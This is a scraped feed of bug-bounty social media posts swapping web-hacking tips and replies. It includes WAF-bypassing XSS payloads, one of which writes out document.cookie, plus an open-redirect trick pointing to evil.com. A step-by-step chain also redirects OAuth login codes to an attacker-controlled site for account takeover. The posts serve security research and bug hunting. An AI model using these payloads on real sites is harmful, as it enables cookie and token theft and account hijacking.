Ahmed

Alhamdulillah, just discovered a new bug! -Tip: When hunting Open Redirects, try inserting //evil.com/..;/css in the URL The server treats it as a local path but the browser redirects outside Add a .js or .css file at the end. #CyberSecurity #Hacker101 #bugbountytips #BugBounty

@nadhn011194 Oos?

@nadhn011194 @HackenProof Full disclose

@coffinxp7 Yes but are you using traslation tool?🤣🤣

i don't have account on BreachFourm. so don't believe it someone just impersonating me..

@xchopath message me

Another XSS w/o Parentheses to Bypass Cloudflare Ngl, this one is still working since 2020 tho... twitter.com/cookiehanhoan/… Modify it a bit to execute via Open Redirect: javascript:_=alert+0;Array.prototype[Symbol.hasInstance]=eval,/alert/.source+_[14]+/1/+_[15]instanceof[]

@xchopath message me

Nuclei is not just a "-u" This is just my personal note...

Bypassing WAF through a large number of characters is a successful method

🤌🤌Free 100+ Hacking / Infosec pdfs 🤌🤌 🚀 If you like my content, please follow and like! 🌟 Let's take this journey to the moon 🚀 and dive into the world of Source: drive.google.com/drive/mobile/f… #infosec #Hacking #infosecurity #Malware #bugbountytips #CTF #BugBounty #vulnerability #pwn #CyberSecurityAwareness #CyberSecurity #cybersecuritytips #bugbounty #bugbountytips #cybersecurity #hackinggroup @SaveToNotion #bugbountytips #Programming #SSRFBible #TechTrends 🚀🔥 #bugbounty #bugbountytips #cybersecurity #hackingtools

200+ Hacking / Infosec pdfs Like and Repost Red Team Experts that explains the importance and details of Windows APIs❗️📷😈📷 Source: drive.google.com/drive/u/0/mobi… Source: drive.google.com/file/d/1qUoyzw… Credit:@C0d3Cr4zy #infosec #Hacking #infosecurity #Malware #bugbountytips #CTF #BugBounty #vulnerability #pwn #CyberSecurityAwareness #CyberSecurity #cybersecuritytips

@xitsec @Hacker0x01 Trip

Choose A program for me from the list ! I will hunt on it ! And will post bounty within a week! #BugBounty #hackerone @Hacker0x01

@akita_zen What is your religion?

🔐💰 Question of the day: How can you maximize payouts for "Low" risk open redirect issues? 🤑 I've personally earned over $30,000 in bounties by chaining open redirect submissions to ATOs. These "Low" severity bugs can often be escalated through a double redirection, resulting in bounties ranging from $750 to $5000, depending on the program. Open redirects can be chained with legitimate redirects, allowing attackers to exfiltrate OAuth codes and tokens for potential account takeovers. Here's the quick breakdown: (1) Find a low-severity open redirect, for example: example.com/next-step?url=…. (2) Look for site login functionality on core domains or subdomains. Assuming login is integrated with Auth0 or another equivalent service provider at login.example.com. In such cases, a valid redirect would usually look something like login.example.com/?redirect_uri= (3) You can now chain the vulnerable open redirect identified in step 1 with the login page and still be able to exfiltrate the login code in most cases. For example, you could craft a URI like login.example.com/?redirect_uri=… When a victim navigates to the above link and logs in, upon successful login, it will redirect them in this flow to the attacker controlled site: login.example.com -> (First Redirect) example.com/next-step?code…: -> (Second Redirect) attackersite.com/?code=:loginco…: As a result, this ultimately leads to the leakage of Auth0 or other equivalent codes/tokens to an attacker-controlled server, resulting in an ATO. Common mistakes: Reporting open redirects as simple issues without escalating their impact. Don't underestimate their potential. Always look for ways to level up! 💡 #BugBounty #InfoSec #openredirect #cybersecurity #bugbountytips #hackerone #bugcrowd,#securitytips,#questionoftheday

Anyone knows of a way to make open redirect a xss? the normal javascript:alert() payload is being blocked by cloudflare #bugbountyHelp

If you want to be good at finding XSS, you need to understand how HTML/javascript work. Copying/pasting a payload everywhere works for some cases, but you'd be missing a lot of cases. What's filtered, your context, and what's possible with this combination are extremely important

Found XSS in private bug-bounty .. document was filtered, so as () .. my final payload -> javascript:setTimeout`\x64ocument.write\x28\x64ocument.\x63ookie\x29` #bugbountytip #BugBounty

Search for all leaked keys/secrets using one regex! regex: gist.github.com/h4x0r-dz/be69c… #BugBounty #bugbountytip

Thread 🧵:👇 Found Open-redirect >> xss >> ato 1) Try normal XSS payload - javascript:alert(1) javascript:%61lert(1) javascript:&#37&#54&#49lert(1) javascript:%26%2337%26%2354%26%2349lert(1) #BugBounty #bugbountytips #infosec #403bypass

Update no 3: Reported 15 submissions (total). Critical one: Used Js Miner & twitter.com/h4x0r_dz/statu… for finding sen* info in JS files. Found a JS file disclosing access token without any endpoint. (1/3)

@MohdKas79797903 hello

@bitgetsp Hi ,

Excited to share my Bug Bounty Script It automates security tests & reconnaissance for target domains including, web server scanning, subdomain enumeration XSS vulnerability scanning, and more!🐞🔍 Check it out GitHub: [github.com/shubham-rooter…] #BugBounty #SecurityTesting #bug